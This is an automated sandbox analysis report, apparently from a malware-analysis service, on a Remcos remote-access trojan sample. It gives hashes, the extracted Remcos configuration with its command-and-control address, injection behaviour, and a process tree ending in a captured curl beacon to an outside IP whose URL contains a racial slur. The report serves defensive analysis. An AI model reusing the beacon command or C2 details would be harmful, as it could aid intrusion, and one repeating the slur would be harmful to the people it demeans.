Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 22-04-2024 11:41
Static task: static1
Behavioral task: behavioral1
  Sample: av_sec.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: av_sec.exe
  Resource: win10v2004-20240412-en
General
Target: av_sec.exe
Size: 11.2MB
MD5: ab2c5633a45550670bca99f5cb82310c
SHA1: 1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e
SHA256: 3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf
SHA512: 80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9
SSDEEP: 196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j
Malware Config
Extracted family: remcos
RemoteHost: 178.33.57.155:443
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-PM1AI7
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  2604  RttHlp.exe
  2792  RttHlp.exe
Loads dropped DLL (6 IoCs)
Processes:
  pid   process
  2604  RttHlp.exe
  2604  RttHlp.exe
  2604  RttHlp.exe
  2604  RttHlp.exe
  2792  RttHlp.exe
  2792  RttHlp.exe
Suspicious use of SetThreadContext (1 IoC)
Processes:
  description                          pid   process     target process
  PID 2792 set thread context of 2732  2792  RttHlp.exe  cmd.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes:
  pid   process
  2784  av_sec.exe
  2784  av_sec.exe
  2604  RttHlp.exe
  2792  RttHlp.exe
  2792  RttHlp.exe
  2732  cmd.exe
  2732  cmd.exe
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
  pid   process
  2792  RttHlp.exe
  2732  cmd.exe
Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
  pid   process
  2784  av_sec.exe
Suspicious use of WriteProcessMemory (27 IoCs)
Processes:
  description                         pid   process       target process
  PID 2784 wrote to memory of 2604    2784  av_sec.exe    RttHlp.exe
  PID 2784 wrote to memory of 2604    2784  av_sec.exe    RttHlp.exe
  PID 2784 wrote to memory of 2604    2784  av_sec.exe    RttHlp.exe
  PID 2784 wrote to memory of 2604    2784  av_sec.exe    RttHlp.exe
  PID 2604 wrote to memory of 2792    2604  RttHlp.exe    RttHlp.exe
  PID 2604 wrote to memory of 2792    2604  RttHlp.exe    RttHlp.exe
  PID 2604 wrote to memory of 2792    2604  RttHlp.exe    RttHlp.exe
  PID 2604 wrote to memory of 2792    2604  RttHlp.exe    RttHlp.exe
  PID 2792 wrote to memory of 2732    2792  RttHlp.exe    cmd.exe
  PID 2792 wrote to memory of 2732    2792  RttHlp.exe    cmd.exe
  PID 2792 wrote to memory of 2732    2792  RttHlp.exe    cmd.exe
  PID 2792 wrote to memory of 2732    2792  RttHlp.exe    cmd.exe
  PID 2792 wrote to memory of 2732    2792  RttHlp.exe    cmd.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
  PID 2360 wrote to memory of 632     2360  explorer.exe  WScript.exe
  PID 2360 wrote to memory of 632     2360  explorer.exe  WScript.exe
  PID 2360 wrote to memory of 632     2360  explorer.exe  WScript.exe
  PID 2360 wrote to memory of 632     2360  explorer.exe  WScript.exe
  PID 632 wrote to memory of 884      632   WScript.exe   cmd.exe
  PID 632 wrote to memory of 884      632   WScript.exe   cmd.exe
  PID 632 wrote to memory of 884      632   WScript.exe   cmd.exe
  PID 632 wrote to memory of 884      632   WScript.exe   cmd.exe
  PID 2732 wrote to memory of 2360    2732  cmd.exe       explorer.exe
Processes (tree; each level is a child of the one above)
1. C:\Users\Admin\AppData\Local\Temp\av_sec.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\av_sec.exe"
   PID: 2784
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
      PID: 2604
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
         Command line: C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
         PID: 2792
         - Executes dropped EXE
         - Loads dropped DLL
         - Suspicious use of SetThreadContext
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious behavior: MapViewOfSection
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\SysWOW64\cmd.exe
            PID: 2732
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\explorer.exe
               Command line: C:\Windows\SysWOW64\explorer.exe
               PID: 2360
               - Suspicious use of WriteProcessMemory
               6. C:\Windows\SysWOW64\WScript.exe
                  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
                  PID: 632
                  - Suspicious use of WriteProcessMemory
                  7. C:\Windows\SysWOW64\cmd.exe
                     Command line: "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE
                     PID: 884
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 5.5MB
MD5: 320634072eddd5b14ddddcf0e32d6608
SHA1: d8db9bf00db95b25d2cd8b2c5888d250b535232b
SHA256: bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714
SHA512: 8ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff

Filesize: 1.2MB
MD5: 0dccfd326ca7456a9ac0c316bc4c7368
SHA1: 9896864f2fb677eda555c325866bec7e5bf284ec
SHA256: e66546f15a3ee8d6793d7cbada206f62e5d07e75b85030996ff793164756df06
SHA512: b60fe1ab7d15f5d87673c747f35a4a8cd069538d4dcb979b0a98c89dc59aa68f355a8c53a5a712652e503ca00b87725ff149995b60f682292e56fe1c67153370

Filesize: 1.0MB
MD5: 40b9628354ef4e6ef3c87934575545f4
SHA1: 8fb5da182dea64c842953bf72fc573a74adaa155
SHA256: 372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12
SHA512: 02b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641

Filesize: 135KB
MD5: a2d70fbab5181a509369d96b682fc641
SHA1: 22afcdc180400c4d2b9e5a6db2b8a26bff54dd38
SHA256: 8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473
SHA512: 219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83

Filesize: 11KB
MD5: 6e4ffb2517b3570bf0c6766b8a0253fa
SHA1: 2143b82dd1c8c3f4d0e0b146e65667a4e8552a9e
SHA256: d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41
SHA512: d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f

Filesize: 1.0MB
MD5: 4b12739a07c02ef25a45d80516a87100
SHA1: d976238dd9a697b7c35f85d3157282dfb68f4522
SHA256: f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6
SHA512: f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265

Filesize: 1.1MB
MD5: adf82ed333fb5567f8097c7235b0e17f
SHA1: e6ccaf016fc45edcdadeb40da64c207ddb33859f
SHA256: d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50
SHA512: 2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92

Filesize: 1.9MB
MD5: 95ecaf8770cb3d948f45588fc04e0dfd
SHA1: 49890478b975dcbb7bac20e330d9498312583f85
SHA256: 5708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285
SHA512: 55fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc

Filesize: 146B
MD5: 85a2ebad40c21ba1da77230265b5351f
SHA1: 803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256: b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512: 77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a